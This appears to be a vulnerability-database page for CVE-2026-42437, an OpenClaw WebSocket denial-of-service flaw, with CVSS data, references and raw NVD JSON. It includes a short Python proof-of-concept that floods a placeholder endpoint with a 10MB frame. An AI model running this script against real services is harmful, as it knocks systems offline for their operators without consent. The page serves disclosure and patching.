CVE-2026-42437

Description

OpenClaw versions 2026.4.9 before 2026.4.10 contain a denial of service vulnerability in the voice-call realtime WebSocket path that accepts oversized frames without proper validation. Remote attackers can send oversized WebSocket frames to cause service unavailability for deployments exposing the webhook path.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

OpenClaw < 2026.4.10

OpenClaw 2026.4.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import asyncio
import websockets

# PoC for CVE-2026-42437: OpenClaw WebSocket DoS
async def send_oversized_frame(uri):
    try:
        async with websockets.connect(uri) as websocket:
            print(f"Connected to {uri}")
            # Send an oversized payload to trigger the DoS
            # Adjust payload size as needed based on server limits
            large_payload = "A" * 10000000  # 10MB payload
            print("Sending oversized frame...")
            await websocket.send(large_payload)
            print("Payload sent. Check server availability.")
    except Exception as e:
        print(f"An error occurred: {e}")

if __name__ == "__main__":
    target_uri = "ws://target-ip:port/websocket-path" 
    # Replace with actual target WebSocket endpoint
    asyncio.get_event_loop().run_until_complete(send_oversized_frame(target_uri))

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42437
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42437
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42437/
[4] VulDB https://vuldb.com/cve/CVE-2026-42437
[5] https://github.com/openclaw/openclaw/commit/afadb7dae6738819ad9c7d2597ace0516957d20e
[6] https://github.com/openclaw/openclaw/security/advisories/GHSA-vw3h-q6xq-jjm5
[7] https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-oversized-websocket-frames-in-voice-call-realtime-path

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42437", "sourceIdentifier": "[email protected]", "published": "2026-05-05T12:16:18.190", "lastModified": "2026-05-05T19:47:31.297", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions 2026.4.9 before 2026.4.10 contain a denial of service vulnerability in the voice-call realtime WebSocket path that accepts oversized frames without proper validation. Remote attackers can send oversized WebSocket frames to cause service unavailability for deployments exposing the webhook path."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/afadb7dae6738819ad9c7d2597ace0516957d20e", "source": "[email protected]"}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vw3h-q6xq-jjm5", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-oversized-websocket-frames-in-voice-call-realtime-path", "source": "[email protected]"}]}}